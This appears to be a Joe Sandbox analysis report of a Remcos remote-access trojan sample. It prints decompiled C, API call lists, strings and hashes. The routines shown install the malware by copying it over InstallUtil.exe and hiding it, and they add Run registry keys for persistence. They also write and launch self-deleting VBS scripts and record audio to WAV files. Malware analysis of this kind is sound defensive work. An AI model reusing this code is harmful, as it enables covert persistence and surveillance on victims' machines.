                                                                        • Part of subcall function 00410C6B: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046E5A0), ref: 00410C87
                                                                        • Part of subcall function 00410C6B: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410CA0
                                                                        • Part of subcall function 00410C6B: RegCloseKey.ADVAPI32(00000000), ref: 00410CAB
                                                                      • ExitProcess.KERNEL32 ref: 0040FFB8
                                                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040FFE1
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040FFEC
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040FFF3
                                                                      • GetCurrentProcessId.KERNEL32 ref: 0040FFF9
                                                                      • PathFileExistsW.SHLWAPI(?), ref: 0041002A
                                                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004100F9
                                                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0041014F
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041015A
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00410161
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00410167
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$CloseOpen$CurrentFileHandleObjectSingleWait$CreateExecuteExistsExitModuleMutexNamePathQueryShellValue
                                                                      • String ID: .exe$Mutex_RemWatchdog$WDH$exepath$open$temp_
                                                                      • API String ID: 2645874385-232273909
                                                                      • Opcode ID: 7a62b18b0243725383dd8cf326720b2ffaa034a2e93bfcd0621e031f5383e7ae
                                                                      • Instruction ID: 9c7f7530cc0d229ad88f41e75bda852e4478526989846a7077277ac27e719e20
                                                                      • Opcode Fuzzy Hash: 7a62b18b0243725383dd8cf326720b2ffaa034a2e93bfcd0621e031f5383e7ae
                                                                      • Instruction Fuzzy Hash: 0951C471A003197BDB10A7A19C49EEE336C9B44719F10417BF501A72D2EFBC9EC68A6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E0040AAE9(char __ecx, void* __edx, void* __eflags, WCHAR* _a4, char _a8) {
                                                                      				char _v0;
                                                                      				char _v24;
                                                                      				char _v32;
                                                                      				void* _v36;
                                                                      				char _v52;
                                                                      				char _v56;
                                                                      				void* _v60;
                                                                      				char _v80;
                                                                      				void* _v84;
                                                                      				char _v96;
                                                                      				void* _v100;
                                                                      				char _v104;
                                                                      				void* _v108;
                                                                      				char _v120;
                                                                      				void* _v124;
                                                                      				char _v128;
                                                                      				void* _v132;
                                                                      				char _v144;
                                                                      				char _v148;
                                                                      				char _v160;
                                                                      				char _v168;
                                                                      				char _v172;
                                                                      				char _v176;
                                                                      				void* _v180;
                                                                      				char _v192;
                                                                      				char _v193;
                                                                      				char _v196;
                                                                      				char _v200;
                                                                      				char _v204;
                                                                      				char _v208;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t56;
                                                                      				void* _t57;
                                                                      				WCHAR* _t62;
                                                                      				int _t63;
                                                                      				void* _t72;
                                                                      				void* _t84;
                                                                      				void* _t85;
                                                                      				int _t87;
                                                                      				void* _t92;
                                                                      				void* _t93;
                                                                      				WCHAR* _t106;
                                                                      				int _t108;
                                                                      				int _t111;
                                                                      				WCHAR* _t115;
                                                                      				int _t116;
                                                                      				void* _t131;
                                                                      				void* _t134;
                                                                      				void* _t238;
                                                                      
                                                                      				_t134 = __edx;
                                                                      				_v193 = __ecx;
                                                                      				_t56 = E00438416(__edx);
                                                                      				_t246 = _t56;
                                                                      				if(_t56 == 0) {
                                                                      					_t237 = _a4;
                                                                      					_t226 = _v193;
                                                                      					_t57 = E0041905E( &_v144, _v193, _t237);
                                                                      					_t238 = 0x46e588;
                                                                      					E00401ED3(0x46e588, _v193, 0x46e588, _t57);
                                                                      				} else {
                                                                      					CreateDirectoryW(E00401EC4(0x46e5b8), 0);
                                                                      					_t237 = _a4;
                                                                      					_t226 = E004078F9( &_v192, 0x46e5b8, 0x46e5b8, "\\");
                                                                      					_t131 = E00402FD4(_t134,  &_v144, _t130, _t237, 0x46e5b8, _t246, _t237);
                                                                      					_t238 = 0x46e588;
                                                                      					E00401ED3(0x46e588, _t130, 0x46e588, _t131);
                                                                      					E00401EC9();
                                                                      				}
                                                                      				E00401EC9();
                                                                      				if(E00438B0D(E00401EC4(_t238), 0x46daf8, _t60) != 0) {
                                                                      					_t62 = E00401EC4(_t238);
                                                                      					_t243 = CopyFileW;
                                                                      					_t63 = CopyFileW(0x46daf8, _t62, 0);
                                                                      					__eflags = _t63;
                                                                      					if(_t63 != 0) {
                                                                      						L12:
                                                                      						_push(E00401EC4(0x46e570));
                                                                      						E0040A9F7(0x46e570);
                                                                      						__eflags = _a8 - 1;
                                                                      						_pop(0x46e5b8);
                                                                      						if(__eflags == 0) {
                                                                      							_t106 = E00401EC4(_t238);
                                                                      							_t237 = SetFileAttributesW;
                                                                      							SetFileAttributesW(_t106, 7);
                                                                      							_t108 = E00438416(_t134);
                                                                      							_pop(0x46e5b8);
                                                                      							__eflags = _t108;
                                                                      							if(__eflags != 0) {
                                                                      								SetFileAttributesW(E00401EC4(0x46e5b8), 7);
                                                                      							}
                                                                      						}
                                                                      						_t227 = E0040413E(_t134,  &_v168, _t226, _t243, E00438A0F(_t134, 0x46e5b8, __eflags, L"Temp"));
                                                                      						E00402FD4(_t134,  &_v148, _t67, _t237, _t243, __eflags, L"\\install.vbs");
                                                                      						E00401EC9();
                                                                      						E0040413E(_t134,  &_v196, _t67, _t243, L"WScript.Sleep 1000\n");
                                                                      						L00407735(_t134,  &_v200, _t237, _t243, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                                                                      						__eflags = _v0 - 1;
                                                                      						_t135 = "\n";
                                                                      						if(__eflags == 0) {
                                                                      							_t237 = "\"";
                                                                      							_t93 = E0040413E("\n",  &_v24, _t227, _t243, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe");
                                                                      							_t227 = E00402FD4(_t135,  &_v128, E00402F65( &_v104, E00402FD4(_t135,  &_v80, E0040413E(_t135,  &_v52, _t227, _t243, L"fso.DeleteFile "), "\"", _t243, __eflags, _t237), _t93), _t237, _t243, __eflags, "\"");
                                                                      							E0040321D(E00402FD4(_t135,  &_v176, _t97, _t237, _t243, __eflags, _t135));
                                                                      							E00401EC9();
                                                                      							E00401EC9();
                                                                      							E00401EC9();
                                                                      							E00401EC9();
                                                                      							E00401EC9();
                                                                      							E00401EC9();
                                                                      						}
                                                                      						_t72 = E0040413E(_t135,  &_v120, _t227, _t243, L"\"\"\", 0");
                                                                      						E0040321D(E00402FD4(_t135,  &_v32, E00402F65( &_v56, E004042DD(_t135,  &_v80, E0040413E(_t135,  &_v172, _t227, _t243, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t243, __eflags, _t238), _t72), _t237, _t243, __eflags, _t135));
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						L00407735(_t135,  &_v204, _t237, _t243, L"fso.DeleteFile(Wscript.ScriptFullName)");
                                                                      						_t84 = E00401EC4( &_v160);
                                                                      						_t85 = E0040243C();
                                                                      						E00401EC4( &_v208);
                                                                      						_t87 = E00418911(_t85 + _t85, _t84, 0);
                                                                      						__eflags = _t87;
                                                                      						if(_t87 == 0) {
                                                                      							L20:
                                                                      							E00401EC9();
                                                                      							return E00401EC9();
                                                                      						} else {
                                                                      							_t92 = ShellExecuteW(0, L"open", E00401EC4( &_v144), 0x4610ec, 0x4610ec, 0);
                                                                      							__eflags = _t92 - 0x20;
                                                                      							if(_t92 <= 0x20) {
                                                                      								goto L20;
                                                                      							}
                                                                      							ExitProcess(0);
                                                                      						}
                                                                      					}
                                                                      					__eflags = _v193 - 0x36;
                                                                      					if(_v193 == 0x36) {
                                                                      						goto L12;
                                                                      					}
                                                                      					_t111 = E00438416(_t134);
                                                                      					_t226 = 0x36;
                                                                      					_push(_t237);
                                                                      					__eflags = _t111;
                                                                      					if(_t111 == 0) {
                                                                      						E00401ED3(_t238, 0x36, _t238, E0041905E( &_v168, 0x36));
                                                                      					} else {
                                                                      						_t226 = E00402FD4(_t134,  &_v120, E0041905E( &_v168, 0x36, _t134), _t237, CopyFileW, __eflags, "\\");
                                                                      						E00401ED3(_t238, _t120, _t238, E00402FD4(_t134,  &_v96, _t120, _t237, CopyFileW, __eflags));
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      					}
                                                                      					E00401EC9();
                                                                      					_t115 = E00401EC4(_t238);
                                                                      					_t237 = 0x46daf8;
                                                                      					_t116 = CopyFileW(0x46daf8, _t115, 0);
                                                                      					__eflags = _t116;
                                                                      					if(_t116 != 0) {
                                                                      						goto L12;
                                                                      					} else {
                                                                      						L00409F8A(_t134, _t238, _t226, 0x46daf8);
                                                                      						return 0;
                                                                      					}
                                                                      				} else {
                                                                      					_push(E00401EC4(0x46e570));
                                                                      					E0040A9F7(0x46e570);
                                                                      					return 1;
                                                                      				}
                                                                      			}

                                                                      0x0040aaf2
                                                                      0x0040aaf4
                                                                      0x0040aafa
                                                                      0x0040ab05
                                                                      0x0040ab07
                                                                      0x0040ab5a
                                                                      0x0040ab65
                                                                      0x0040ab6a
                                                                      0x0040ab70
                                                                      0x0040ab78
                                                                      0x0040ab09
                                                                      0x0040ab13
                                                                      0x0040ab19
                                                                      0x0040ab32
                                                                      0x0040ab38
                                                                      0x0040ab3e
                                                                      0x0040ab46
                                                                      0x0040ab4f
                                                                      0x0040ab54
                                                                      0x0040ab81
                                                                      0x0040ab9d
                                                                      0x0040abbd
                                                                      0x0040abc4
                                                                      0x0040abca
                                                                      0x0040abcc
                                                                      0x0040abce
                                                                      0x0040ac6d
                                                                      0x0040ac77
                                                                      0x0040ac79
                                                                      0x0040ac7e
                                                                      0x0040ac87
                                                                      0x0040ac88
                                                                      0x0040ac8e
                                                                      0x0040ac93
                                                                      0x0040ac9a
                                                                      0x0040ac9d
                                                                      0x0040aca2
                                                                      0x0040aca3
                                                                      0x0040aca5
                                                                      0x0040acb4
                                                                      0x0040acb4
                                                                      0x0040aca5
                                                                      0x0040acd0
                                                                      0x0040acd6
                                                                      0x0040ace0
                                                                      0x0040acee
                                                                      0x0040acfc
                                                                      0x0040ad01
                                                                      0x0040ad09
                                                                      0x0040ad0e
                                                                      0x0040ad15
                                                                      0x0040ad27
                                                                      0x0040ad69
                                                                      0x0040ad7a
                                                                      0x0040ad83
                                                                      0x0040ad8c
                                                                      0x0040ad95
                                                                      0x0040ada1
                                                                      0x0040adad
                                                                      0x0040adb9
                                                                      0x0040adb9
                                                                      0x0040adc8
                                                                      0x0040ae0f
                                                                      0x0040ae1b
                                                                      0x0040ae27
                                                                      0x0040ae33
                                                                      0x0040ae3c
                                                                      0x0040ae45
                                                                      0x0040ae53
                                                                      0x0040ae5f
                                                                      0x0040ae69
                                                                      0x0040ae76
                                                                      0x0040ae7f
                                                                      0x0040ae86
                                                                      0x0040ae88
                                                                      0x0040aeb4
                                                                      0x0040aeb8
                                                                      0x00000000
                                                                      0x0040ae8a
                                                                      0x0040aea2
                                                                      0x0040aea8
                                                                      0x0040aeab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040aeae
                                                                      0x0040aeae
                                                                      0x0040ae88
                                                                      0x0040abd4
                                                                      0x0040abd9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040abe0
                                                                      0x0040abe5
                                                                      0x0040abec
                                                                      0x0040abed
                                                                      0x0040abef
                                                                      0x0040ac3a
                                                                      0x0040abf1
                                                                      0x0040ac09
                                                                      0x0040ac18
                                                                      0x0040ac21
                                                                      0x0040ac2a
                                                                      0x0040ac2a
                                                                      0x0040ac43
                                                                      0x0040ac4c
                                                                      0x0040ac52
                                                                      0x0040ac58
                                                                      0x0040ac5a
                                                                      0x0040ac5c
                                                                      0x00000000
                                                                      0x0040ac5e
                                                                      0x0040ac61
                                                                      0x00000000
                                                                      0x0040ac66
                                                                      0x0040ab9f
                                                                      0x0040aba9
                                                                      0x0040abab
                                                                      0x00000000
                                                                      0x0040abb2

                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 0040AAFA
                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0046E600,?,00000000), ref: 0040AB13
                                                                      • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe,00000000,00000000,00000000,00000000,0046E600,?,00000000), ref: 0040ABCA
                                                                      • _wcslen.LIBCMT ref: 0040ABE0
                                                                      • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe,00000000,00000000,00000000), ref: 0040AC58
                                                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AC9A
                                                                      • _wcslen.LIBCMT ref: 0040AC9D
                                                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040ACB4
                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,004610EC,004610EC,00000000), ref: 0040AEA2
                                                                      • ExitProcess.KERNEL32 ref: 0040AEAE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                                                      • String ID: """, 0$6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                      • API String ID: 2743683619-4264382174
                                                                      • Opcode ID: 2879f92fe03c27c592680b251b994213c7d2a24ebb03d226a4e0e84e18f3e819
                                                                      • Instruction ID: cdb898408122807b9306d3bdb2b1774f24414caa006db9133b5e780cf41d0cef
                                                                      • Opcode Fuzzy Hash: 2879f92fe03c27c592680b251b994213c7d2a24ebb03d226a4e0e84e18f3e819
                                                                      • Instruction Fuzzy Hash: 499170716183416AD218F722DC62EAF73E99F90349F10443FF446661E2EE3C994AC69F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E0040AED1() {
                                                                      				short _v524;
                                                                      				char _v548;
                                                                      				char _v572;
                                                                      				char _v576;
                                                                      				char _v596;
                                                                      				char _v600;
                                                                      				void* _v604;
                                                                      				char _v620;
                                                                      				char _v624;
                                                                      				void* _v628;
                                                                      				char _v644;
                                                                      				char _v648;
                                                                      				char _v652;
                                                                      				char _v668;
                                                                      				char _v672;
                                                                      				void* _v676;
                                                                      				void* _t49;
                                                                      				void* _t50;
                                                                      				void* _t53;
                                                                      				void* _t56;
                                                                      				void* _t71;
                                                                      				void* _t82;
                                                                      				void* _t84;
                                                                      				void* _t85;
                                                                      				signed char _t123;
                                                                      				signed char _t124;
                                                                      				void* _t195;
                                                                      				void* _t228;
                                                                      				void* _t230;
                                                                      				void* _t231;
                                                                      				void* _t232;
                                                                      
                                                                      				E0041030A();
                                                                      				if( *0x46c9c4 != 0x30) {
                                                                      					E00409F34();
                                                                      				}
                                                                      				_t228 =  *0x46dd5b - 1; // 0x0
                                                                      				if(_t228 == 0) {
                                                                      					E0041628E(_t195, _t228);
                                                                      				}
                                                                      				if( *0x46da75 != 0) {
                                                                      					E004187B1(E00401EC4(0x46e0d8), _t195);
                                                                      				}
                                                                      				_t213 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                                                      				_t230 =  *0x46daf7 - 1; // 0x1
                                                                      				if(_t230 == 0) {
                                                                      					E00410F97(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EC4(0x46e570));
                                                                      				}
                                                                      				_t231 =  *0x46daf4 - 1; // 0x0
                                                                      				if(_t231 == 0) {
                                                                      					E00410F97(0x80000002, _t213, E00401EC4(0x46e570));
                                                                      				}
                                                                      				_t232 =  *0x46daf5 - 1; // 0x0
                                                                      				if(_t232 == 0) {
                                                                      					E00410F97(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EC4(0x46e570));
                                                                      				}
                                                                      				E004337A0(0,  &_v524, 0, 0x208);
                                                                      				_t49 = E0040243C();
                                                                      				_t50 = E00401F6B(0x46e5e8);
                                                                      				_t53 = E00410C6B(E00401F6B(0x46e5a0), "exepath",  &_v524, 0x208, _t50, _t49);
                                                                      				_t233 = _t53;
                                                                      				if(_t53 == 0) {
                                                                      					GetModuleFileNameW(0,  &_v524, 0x208);
                                                                      				}
                                                                      				RegDeleteKeyA(0x80000001, E00401F6B(0x46e5a0));
                                                                      				_t56 = E004078C9(_t233);
                                                                      				_t234 = _t56;
                                                                      				if(_t56 != 0) {
                                                                      					SetFileAttributesW(E00401EC4(0x46e5b8), 0x80);
                                                                      				}
                                                                      				_t123 =  ~(SetFileAttributesW( &_v524, 0x80));
                                                                      				asm("sbb bl, bl");
                                                                      				E00402FD4(_t123,  &_v548, E00418385( &_v620, E00418114( &_v668)), 0, 0x4610ec, _t234, L".vbs");
                                                                      				E00401EC9();
                                                                      				E00401F98();
                                                                      				E004042DD(_t123,  &_v576, E00402FD4(_t123,  &_v672, E0040413E(_t123,  &_v620, _t60, 0x4610ec, E00438A0F(_t123,  &_v668, _t234, L"Temp")), 0, 0x4610ec, _t234, "\\"), 0x4610ec, _t234,  &_v548);
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				_t71 = E0040413E(_t123,  &_v672, _t67, 0x4610ec, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                                                                      				_t202 = L"On Error Resume Next\n";
                                                                      				E004042BC(_t123,  &_v652, L"On Error Resume Next\n", 0x4610ec, _t234, _t71);
                                                                      				E00401EC9();
                                                                      				_t124 = _t123 & 0x00000001;
                                                                      				_t235 = _t124;
                                                                      				if(_t124 != 0) {
                                                                      					_t202 = E004042BC(_t124,  &_v624, L"while fso.FileExists(\"", 0x4610ec, _t235, E0040413E(_t124,  &_v596, L"On Error Resume Next\n", 0x4610ec,  &_v524));
                                                                      					E0040321D(E00402FD4(_t124,  &_v672, _t98, 0, 0x4610ec, _t235, L"\")\n"));
                                                                      					E00401EC9();
                                                                      					E00401EC9();
                                                                      					E00401EC9();
                                                                      				}
                                                                      				E0040321D(E00402FD4(_t124,  &_v600, E00402FD4(_t124,  &_v672, E0040413E(_t124,  &_v620, _t202, 0x4610ec, L"fso.DeleteFile \""), 0, 0x4610ec, _t235,  &_v524), 0, 0x4610ec, _t235, L"\"\n"));
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				_t236 = _t124;
                                                                      				if(_t124 != 0) {
                                                                      					L00407735(_t124,  &_v644, 0, 0x4610ec, L"wend\n");
                                                                      				}
                                                                      				_t82 = E004078C9(_t236);
                                                                      				_t237 = _t82;
                                                                      				if(_t82 != 0) {
                                                                      					E0040321D(E00402FD4(_t124,  &_v596, E0040A01F( &_v668, L"fso.DeleteFolder \"", 0x4610ec, 0x46e5b8), 0, 0x4610ec, _t237, L"\"\n"));
                                                                      					E00401EC9();
                                                                      					E00401EC9();
                                                                      				}
                                                                      				L00407735(_t124,  &_v644, 0, 0x4610ec, L"fso.DeleteFile(Wscript.ScriptFullName)");
                                                                      				_t84 = E00401EC4( &_v576);
                                                                      				_t85 = E0040243C();
                                                                      				E00401EC4( &_v648);
                                                                      				if(E00418911(_t85 + _t85, _t84, 0) != 0) {
                                                                      					ShellExecuteW(0, L"open", E00401EC4( &_v572), 0x4610ec, 0x4610ec, 0);
                                                                      				}
                                                                      				ExitProcess(0);
                                                                      			}

                                                                      0x0040aedb
                                                                      0x0040aee7
                                                                      0x0040aee9
                                                                      0x0040aee9
                                                                      0x0040aef1
                                                                      0x0040aef7
                                                                      0x0040aef9
                                                                      0x0040aef9
                                                                      0x0040af05
                                                                      0x0040af13
                                                                      0x0040af13
                                                                      0x0040af1d
                                                                      0x0040af22
                                                                      0x0040af28
                                                                      0x0040af39
                                                                      0x0040af3e
                                                                      0x0040af44
                                                                      0x0040af4a
                                                                      0x0040af58
                                                                      0x0040af5d
                                                                      0x0040af5e
                                                                      0x0040af64
                                                                      0x0040af75
                                                                      0x0040af7a
                                                                      0x0040af8c
                                                                      0x0040af9b
                                                                      0x0040afa3
                                                                      0x0040afc5
                                                                      0x0040afcd
                                                                      0x0040afcf
                                                                      0x0040afdb
                                                                      0x0040afdb
                                                                      0x0040afee
                                                                      0x0040b002
                                                                      0x0040b00d
                                                                      0x0040b00f
                                                                      0x0040b01e
                                                                      0x0040b01e
                                                                      0x0040b035
                                                                      0x0040b03c
                                                                      0x0040b057
                                                                      0x0040b061
                                                                      0x0040b06a
                                                                      0x0040b0a3
                                                                      0x0040b0ad
                                                                      0x0040b0b6
                                                                      0x0040b0c4
                                                                      0x0040b0ca

                                                                      APIs
                                                                        • Part of subcall function 0041030A: TerminateProcess.KERNEL32(00000000,0046E588,0040D393), ref: 0041031A
                                                                        • Part of subcall function 0041030A: WaitForSingleObject.KERNEL32(000000FF), ref: 0041032D
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,0046E5A0,pth_unenc,0046E588), ref: 0040AFDB
                                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040AFEE
                                                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,0046E5A0,pth_unenc,0046E588), ref: 0040B01E
                                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,0046E5A0,pth_unenc,0046E588), ref: 0040B02D
                                                                        • Part of subcall function 00409F34: TerminateThread.KERNEL32(Function_00008A37,00000000,0046E588,0040AEEE,?,0046E5A0,pth_unenc,0046E588), ref: 00409F43
                                                                        • Part of subcall function 00409F34: UnhookWindowsHookEx.USER32(0025013B), ref: 00409F53
                                                                        • Part of subcall function 00409F34: TerminateThread.KERNEL32(Function_00008A21,00000000,?,0046E5A0,pth_unenc,0046E588), ref: 00409F65
                                                                        • Part of subcall function 00418114: GetCurrentProcessId.KERNEL32(00000000,76F1FBB0,00000000,?,?,?,?,004610EC,0040B043,.vbs,?,?,?,?,?,0046E5A0), ref: 0041813B
                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,004610EC,004610EC,00000000), ref: 0040B248
                                                                      • ExitProcess.KERNEL32 ref: 0040B24F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                      • String ID: ")$.vbs$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                      • API String ID: 3797177996-2576244540
                                                                      • Opcode ID: 4c64382ddb97d8ff81256f1915caf1e90f7033956b8d0fe56b616e5b14eca6c0
                                                                      • Instruction ID: 801c7e5999a756b5f7540a02e4d46a31ed507c5808ea6cb679f541176d1c9f0b
                                                                      • Opcode Fuzzy Hash: 4c64382ddb97d8ff81256f1915caf1e90f7033956b8d0fe56b616e5b14eca6c0
                                                                      • Instruction Fuzzy Hash: CA817F716183405AC718FB22DC629AF73A99B90709F14443FF442A71E2FE7C9D4AC69E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E00401A2D(WCHAR* __ecx, signed int __edx) {
                                                                      				void _v4;
                                                                      				void _v8;
                                                                      				void _v12;
                                                                      				void _v16;
                                                                      				void _v20;
                                                                      				void _v24;
                                                                      				long _v28;
                                                                      				signed int _t36;
                                                                      				void** _t75;
                                                                      				signed int _t80;
                                                                      				void* _t81;
                                                                      				signed int _t83;
                                                                      
                                                                      				_t75 = __edx;
                                                                      				_t80 =  *0x46da9a & 0x0000ffff;
                                                                      				_t83 = ( *0x46daa6 & 0x0000ffff) * _t80;
                                                                      				_v16 = 1;
                                                                      				_v20 = 0x10;
                                                                      				_v12 = _t83 *  *0x46da9c >> 3;
                                                                      				asm("cdq");
                                                                      				_v8 = _t83 + (__edx & 0x00000007) >> 3;
                                                                      				_t5 =  &(_t75[1]); // 0x0
                                                                      				_t36 =  *_t5 * _t80;
                                                                      				_v4 = _t36;
                                                                      				_v24 = _t36 + 0x24;
                                                                      				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                      				if(_t81 != 0xffffffff) {
                                                                      					_push(0);
                                                                      					WriteFile(_t81, "RIFF", 0, 4,  &_v28);
                                                                      					WriteFile(_t81,  &_v24, 0,  &_v28, 0);
                                                                      					WriteFile(_t81, "WAVE", 0,  &_v28, 0);
                                                                      					WriteFile(_t81, "fmt ", 0,  &_v28, 0);
                                                                      					WriteFile(_t81,  &_v20, 0,  &_v28, 0);
                                                                      					WriteFile(_t81,  &_v16, 2,  &_v28, 0);
                                                                      					WriteFile(_t81, 0x46da9a, 2,  &_v28, 0);
                                                                      					WriteFile(_t81, 0x46da9c, 0,  &_v28, 0);
                                                                      					WriteFile(_t81,  &_v12, 0,  &_v28, 0);
                                                                      					WriteFile(_t81,  &_v8, 2,  &_v28, 0);
                                                                      					WriteFile(_t81, 0x46daa6, 2,  &_v28, 0);
                                                                      					WriteFile(_t81, "data", 0,  &_v28, 0);
                                                                      					WriteFile(_t81,  &_v4, 0,  &_v28, 0);
                                                                      					_t28 =  &(_t75[1]); // 0x0
                                                                      					WriteFile(_t81,  *_t75,  *_t28,  &_v28, 0);
                                                                      					CloseHandle(_t81);
                                                                      					return 1;
                                                                      				}
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401A99
                                                                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AC3
                                                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AD3
                                                                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401AE3
                                                                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401AF3
                                                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B03
                                                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B14
                                                                      • WriteFile.KERNEL32(00000000,0046DA9A,00000002,00000000,00000000), ref: 00401B25
                                                                      • WriteFile.KERNEL32(00000000,0046DA9C,00000004,00000000,00000000), ref: 00401B35
                                                                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B45
                                                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B56
                                                                      • WriteFile.KERNEL32(00000000,0046DAA6,00000002,00000000,00000000), ref: 00401B67
                                                                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B77
                                                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B87
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$Write$Create
                                                                      • String ID: RIFF$WAVE$data$fmt
                                                                      • API String ID: 1602526932-4212202414
                                                                      • Opcode ID: a705cae664cf4fbeb000453d8aee87cfebac97f8560e5cf804a01f08f43cd4ab
                                                                      • Instruction ID: 3f40b1f8be9e92d4fbbdd685f5502258d59ba1ee4827fe56c80a4f4cfc1e7d52
                                                                      • Opcode Fuzzy Hash: a705cae664cf4fbeb000453d8aee87cfebac97f8560e5cf804a01f08f43cd4ab
                                                                      • Instruction Fuzzy Hash: BB416072A583187EE210DA91DC85FBB7EECEB85B50F40051AF644DA080E7A4E905DBB3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 87%
                                                                      			E0044B19E(signed int _a4, signed int _a8) {
                                                                      				signed int _v0;
                                                                      				signed char _v5;
                                                                      				intOrPtr _v8;
                                                                      				signed char _v9;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				intOrPtr _v24;
                                                                      				signed int _v44;
                                                                      				signed int _v92;
                                                                      				signed int _v128;
                                                                      				void* __ebx;
